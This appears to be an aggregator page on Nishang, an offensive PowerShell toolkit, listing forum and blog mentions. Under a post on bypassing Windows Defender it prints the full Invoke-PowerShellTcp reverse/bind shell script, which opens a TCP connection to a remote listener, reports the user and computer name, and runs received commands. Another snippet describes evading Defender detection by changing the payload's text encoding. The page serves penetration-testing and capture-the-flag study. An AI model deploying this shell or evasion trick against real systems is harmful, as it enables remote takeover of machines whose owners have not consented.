Nishang - Offensive PowerShell for red team, penetration testing and offensive security. (by samratashok)

Nishang Alternatives

Similar projects and alternatives to nishang

NOTE: The number of mentions on this list indicates mentions on common posts plus user suggested alternatives. Hence, a higher number means a better nishang alternative or higher similarity.

nishang reviews and mentions

Posts with mentions or reviews of nishang. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2023-08-27.
  • Bypassing Windows Defender (10 Ways)
    15 projects | | 27 Aug 2023
    function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. The script is derived from Powerfun written by Ben Turner & Dave Hardy .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Invoke-PowerShellTcp -Bind -Port 4444 Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port. .LINK #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } Invoke-PowerShellTcp -Reverse -IPAddress -Port 80
  • Powershell scripts suggestions!
    3 projects | /r/cybersecurity | 1 Jul 2023
  • Discrepancies in detecting obfuscated payloads by Windows Defender?
    2 projects | /r/hacking | 28 Sep 2022
    After that I expanded my research and tried a payload from GitHub user samratashok and followed this Guide in which only the text encoding method is altered from ASCII to UTF8. And guess what? It actually worked, Windows Defender does not detect it!
  • Writeup: HackTheBox Bounty - Without Metasploit (OSCP Prep)
    2 projects | | 14 Sep 2021
    I am going to copy/paste the following nishang Reverse Shell in the newly created file link.
  • Can't download script for the alfred room, (git repo issue)
    3 projects | /r/tryhackme | 18 Aug 2021
    I figured out what the issue was, sudo git clone only works on a directory not on a file so it could only have been
    3 projects | /r/tryhackme | 18 Aug 2021
    On the room alfred, when I try to download the script into the opt directory I keep getting an error. is sudo git clone appropriate in this instance, along with changing the end of the url to .git? I'm 99% sure it is root@ip-10-10-96-225:/opt# sudo git clone Cloning into 'Invoke-PowerShellTcp'... fatal: repository I also tried using: sudo git remote add and sudo git remote add origin
    3 projects | /r/tryhackme | 18 Aug 2021
    sudo git clone
  • A note from our sponsor - SonarQube | 22 Sep 2023
    Your projects are multi-language. So is SonarQube analysis. Find Bugs, Vulnerabilities, Security Hotspots, and Code Smells so you can release quality code every time. Get started analyzing your projects today for free. Learn more →


Basic nishang repo stats
17 days ago
Collect and Analyze Billions of Data Points in Real Time
Manage all types of time series data in a single, purpose-built database. Run at any scale in any environment in the cloud, on-premises, or at the edge.